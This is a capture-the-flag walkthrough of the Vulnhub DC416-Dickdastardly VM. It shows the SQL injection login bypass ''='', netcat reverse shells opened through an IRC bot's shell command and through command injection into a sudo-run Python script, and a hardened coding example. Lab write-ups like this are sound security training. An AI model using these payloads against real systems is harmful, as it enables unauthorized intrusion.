[Vulnhub] DC416-Dickdastardly

Hey everyone, we've got another Vulnhub VM from the DC416 series.

Let's start by doing a port scan. We can see ports 22 and 80 are open and port 6667 is filtered. Port 6667 is an IRC server, so let's try to connect to it with an IRC client to see if we can determine the version of the server.

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
6667/tcp filtered irc
MAC Address: 00:0C:29:3C:F5:B9 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Hmm, I couldn't connect to the IRC server, so let's leave that for now. I fire up dirbuster to scan for hidden directories and files, and we find some really interesting files.

Let's check out the headers by using the command

curl -v 192.168.1.14
* Rebuilt URL to: 192.168.1.14/
* Trying 192.168.1.14...
* Connected to 192.168.1.14 (192.168.1.14) port 80 (#0)
> GET / HTTP/1.1
> Host: 192.168.1.14
> User-Agent: curl/7.50.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Mon, 19 Dec 2016 18:08:24 GMT
< Server: Apache/2.4.7 (Ubuntu)
< Last-Modified: Mon, 17 Oct 2016 16:04:49 GMT
< ETag: "1eb-53f11bc50cf74"
< Accept-Ranges: bytes
< Content-Length: 491
< Vary: Accept-Encoding
< Flag: flag1{l0l_h0w_345y_15_7h15_c7f}
< Content-Type: text/html

So as we can see, there was a header named Flag, which contained the flag.

First flag: flag1{l0l_h0w_345y_15_7h15_c7f}

Now let's visit the admin.php page. As we can see, this looks like a guestbook, but on the right side we see an admin panel, so let's try some basic SQL injection bypasses to log in as admin.

'=' user field
'=' password field

This allowed us to log in as the admin.


Now I can also see why we couldn't log in to the IRC server: our IP needed to be whitelisted first, which explains why we couldn't connect at first. So let's try to whitelist our IP, and then reconnect to the IRC server.


So after whitelisting our IP we can now connect to the IRC server. Now let's try to add the Supybot and create a user and password for it, after joining the #vulnhub channel. We can see the bot is named vulnhub bot.

After typing help it shows us:

(help [] []) -- This command gives a useful description of what  does. is only necessary if the command is in more than one plugin. You may also want to use the 'list' command to list all available plugins and commands.

So we type !list

Admin, AutoMode, Channel, Config, Misc, NickAuth, Owner, Unix, User, and Utilities

Hmm, Unix seems interesting to me.

Type !list Unix

call, crypt, errno, fortune, pid, ping, ping6, progstats, shell, spell, sysuname, sysuptime, and wtf

When I typed !shell ls it said:

root: I don’t recognize you. You can message me either of these two commands: “user identify ” to log in or “user register ” to register.

!user identify admin test
-vulnhub-bot- The operation succeeded.

Nice, now let's see if we can execute the ls command.

!shell ls
-vulnhub-bot- backup, conf, data, flag2, logs, plugins, tmp, vulnhub-bot.conf, vulnhub-bot.conf.bak, and web

Yep! This worked like a charm. We can already see the flag sitting there, but I want a shell 🙂

Now set up a netcat listener. In your terminal, type nc -lvp 4444

Type this in the bot's chat window:

!shell nc -e /bin/sh 192.168.1.15 4444


And we got a reverse shell. Now if we type ls we have the flag there, just cat it.


cat flag2
flag2{y0u’r3_4_5upyb07_n00b_m8}

Now let's go for the last flag. First we check if the current user has any permission to execute sudo commands; we do this by using sudo -l


So it appears we can execute a Python program with the permissions of the user vulnhub. Let's see what it does.

sudo -u vulnhub /usr/bin/python /usr/local/sbin/util.py


Ahh nice, there is a coffee command. I need that right now since I've already been hacking all day, and it's quite late here.


Ahh nice, that's better. Now let's get back to getting the last flag lol. whoami prints out the current permissions of this program. Nice, it's a step higher up than we have, so if we get a shell with this program, then we have escalated our privileges to the user vulnhub.

So after some trial & error on the List Directory command, I managed to get code execution by using |, so we set up another netcat listener: nc -lvp 4445

Enter dir to list: | nc -e /bin/bash 192.168.1.15 4445
| nc -e /bin/bash 192.168.1.15 4445
ls: write error: Broken pipe

We get the broken pipe but we still manage to get a shell.

Great! Now we are vulnhub. From here we can go to /home/vulnhub/, run ls, and here it is, the last flag!

flag3{n3x7_71m3_54n17153_y0ur_1npu7}
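
The List Directory escape above works because the typed value reaches a shell. As an added example (not util.py's actual code, which this write-up does not show), here is that vulnerable pattern next to a hardened form; the function names and the harmless echo probe are hypothetical.

```python
import os
import subprocess
import tempfile


def list_dir_unsafe(user_input):
    """Vulnerable pattern: input is concatenated into a shell command line."""
    # shell=True hands the whole string to /bin/sh, so |, ;, && and $() are
    # interpreted as shell syntax instead of being part of a directory name.
    proc = subprocess.run("ls " + user_input, shell=True,
                          stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
    return proc.stdout.decode()


def list_dir_safe(user_input):
    """Hardened form: validate the input, then run ls without any shell."""
    path = os.path.realpath(user_input)
    if not os.path.isdir(path):
        raise ValueError("not a directory: %r" % user_input)
    # The path is one argv element, so metacharacters stay literal.
    # "--" ends option parsing so a name starting with "-" is not a flag.
    proc = subprocess.run(["ls", "--", path],
                          stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    return proc.stdout.decode()


def demo():
    # Constructed sample data: a scratch directory holding one file.
    with tempfile.TemporaryDirectory() as scratch:
        open(os.path.join(scratch, "notes.txt"), "w").close()
        probe = "| echo INJECTED"  # harmless stand-in for an injected command
        results = {
            "unsafe": list_dir_unsafe(probe),
            "safe_listing": list_dir_safe(scratch),
        }
        try:
            list_dir_safe(probe)
            results["safe_rejected"] = False
        except ValueError:
            results["safe_rejected"] = True
        return results


if __name__ == "__main__":
    print(demo())
```

For a tool that is reachable through sudo, os.listdir() would avoid spawning a process at all; ls is kept here only to mirror the command seen in the output above.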


Thanks for reading my write-up, as always.
Thanks to @Vulnhub and @RastaMouse for creating this VM.


2 thoughts on “[Vulnhub] DC416-Dickdastardly”

  1. Don’t forget that there is a flag0. If you check out processes running as root, you will find the following:
    ping -c 1 -b 192.168.110.255 -p 5f6d6f72655f796f755f6172655f6162 2
    The pattern is obviously a set of hex encoded characters. Since ping is sending the pattern to the broadcast address, all you need to do is fire up wireshark and piece together a few packets:
    flag0{the_quieter_you_become_the_more_you_are_able_to_hear}
